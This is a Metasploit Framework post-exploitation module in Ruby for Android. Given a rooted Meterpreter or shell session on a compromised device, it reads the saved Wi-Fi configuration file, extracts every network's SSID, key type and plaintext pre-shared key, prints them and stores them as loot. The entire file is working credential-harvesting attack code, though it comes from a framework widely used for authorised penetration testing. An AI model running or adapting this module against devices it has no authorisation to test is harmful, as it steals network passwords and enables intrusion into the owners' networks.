metasploit-framework/modules/post/android/gather/wireless_ap.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post

  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Post::Android::Priv

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'Displays wireless SSIDs and PSKs',
          'Description' => %q{
            This module displays all wireless AP creds saved on the target device.
          },
          'License' => MSF_LICENSE,
          'Author' => ['Auxilus', 'timwr'],
          'SessionTypes' => [ 'meterpreter', 'shell' ],
          'Platform' => 'android'
        }
      )
    )
  end

  def run
    unless is_root?
      print_error('This module requires root permissions.')
      return
    end

    data = read_file('/data/misc/wifi/wpa_supplicant.conf')
    aps = parse_wpa_supplicant(data)

    if aps.empty?
      print_error('No wireless APs found on the device')
      return
    end
    ap_tbl = Rex::Text::Table.new(
      'Header' => 'Wireless APs',
      'Indent' => 1,
      'Columns' => ['SSID', 'net_type', 'password']
    )

    aps.each do |ap|
      ap_tbl << [
        ap[0],  # SSID
        ap[1],  # TYPE
        ap[2]   # PASSWORD
      ]
    end

    print_line(ap_tbl.to_s)
    p = store_loot(
      'wireless.ap.creds',
      'text/csv',
      session,
      ap_tbl.to_csv,
      File.basename('wireless_ap_credentials.txt')
    )
    print_good("Secrets stored in: #{p}")
  end

  def parse_wpa_supplicant(data)
    aps = []
    networks = data.scan(/^network={$(.*?)^}$/m)
    networks.each do |block|
      aps << parse_network_block(block[0])
    end
    aps
  end

  def parse_network_block(block)
    ssid = parse_option(block, 'ssid')
    type = parse_option(block, 'key_mgmt', false)
    psk = parse_option(block, 'psk')
    [ssid, type, psk]
  end

  def parse_option(block, token, strip_quotes = true)
    if strip_quotes && ((result = block.match(/^\s#{token}="(.+)"$/)))
      return result.captures[0]
    elsif (result = block.match(/^\s#{token}=(.+)$/))
      return result.captures[0]
    end
  end

end